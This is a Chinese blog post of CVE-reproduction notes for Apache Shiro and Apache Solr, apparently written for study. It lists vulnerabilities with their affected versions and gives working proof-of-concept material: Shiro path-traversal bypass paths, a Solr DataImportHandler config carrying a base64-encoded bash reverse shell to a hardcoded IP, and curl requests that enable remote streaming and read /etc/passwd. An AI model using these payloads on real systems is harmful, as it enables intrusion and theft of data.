框架安全&CVE复现&Apache Shiro&Apache Solr
Apache Shiro:
Apache Shiro是一个强大且易用的Java安全框架,用于身份验证、授权、密码和会话管理
判断:大多会发生在登录处,返回包里包含remeberMe=deleteMe字段
漏洞:https://avd.aliyun.com/search?q=shiro
Apache Shiro <= 1.2.4 默认密钥致命令执行漏洞【CVE-2016-4483】
Apache Shiro < 1.3.2 验证绕过漏洞【CVE-2016-2807】
Apache Shiro < 1.4.2 cookie oracle padding漏洞 【CVE-2019-12442】
Apache Shiro < 1.5.2 验证绕过漏洞 【CVE-2020-1957】
Apache Shiro < 1.5.3 验证绕过漏洞 【CVE-2020-11989】
Apahce Shiro < 1.6.0 验证绕过漏洞 【CVE-2020-13933】
Apahce Shiro < 1.7.1 权限绕过漏洞 【CVE-2020-17523】
1、CVE_2016_4437 Shiro-550+Shiro-721 2、CVE-2020-11989 Poc:/admin/%20 影响范围:Apache Shiro < 1.7.1 https://github.com/jweny/shiro-cve-2020-17523 3、CVE-2020-1957 Poc:/xxx/..;/admin/ 影响范围:Apache Shiro < 1.5.3Apache Solr:
Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。
漏洞:https://avd.aliyun.com/search?q=solr
远程命令执行RCE(CVE-2017-12629)
远程命令执行XXE(CVE-2017-12629)
任意文件读取AND命令执行(CVE-2019-17558)
远程命令执行漏洞(CVE-2019-0192)
远程命令执行漏洞(CVE-2019-0193)
未授权上传漏洞(CVE-2020-13957)
Apache Solr SSRF (CVE-2021-27905)
1、远程命令执行RCE(CVE-2017-12629)
Apache solr<7.1.0版本
2、任意文件读取AND命令执行(CVE-2019-17558)
Apache Solr 5.0.0版本至8.3.1 https://github.com/jas502n/solr_rce D:\Python27\python.exe solr_rce.py http://123.58.236.76:50847 id3、远程命令执行漏洞(CVE-2019-0193)
Apache Solr < 8.2.0版本 <dataConfig> <dataSource type="URLDataSource"/> <script><![CDATA[ function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"); } ]]></script> <document> <entity name="stackoverflow" url="https://stackoverflow.com/feeds/tag/solr" processor="XPathEntityProcessor" forEach="/feed" transformer="script:poc" /> </document> </dataConfig> 4、Apache Solr 文件读取&SSRF (CVE-2021-27905) 全版本官方拒绝修复漏洞 1、获取数据库名 http://47.94.236.117:8983/solr/admin/cores?indexInfo=false&wt=json 2、访问触发 curl -i -s -k -X $'POST' \ -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \ $'http://47.94.236.117:8983/solr/demo/config' 3、任意文件读取 curl -i -s -k 'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'
上一篇
APP攻防-微信小程序&解包反编译&数据抓包&APK信息资源提取
APP攻防-微信小程序&解包反编译&数据抓包&APK信息资源提取
1、渗透角度:测试的app提供服务的服务器,网站,接口等,一旦这个有安全问题,被不法分子利用,相当于APP正常服务就会受到直接的影响!
APK
2022-05-10
下一篇
框架安全&CVE复现&Django&Flask&Node.JS&JQuery
框架安全&CVE复现&Django&Flask&Node.JS&JQuery
JavaScript-开发框架安全-Jquery&NodejQuery
1、cve_2018_9207
2022-04-23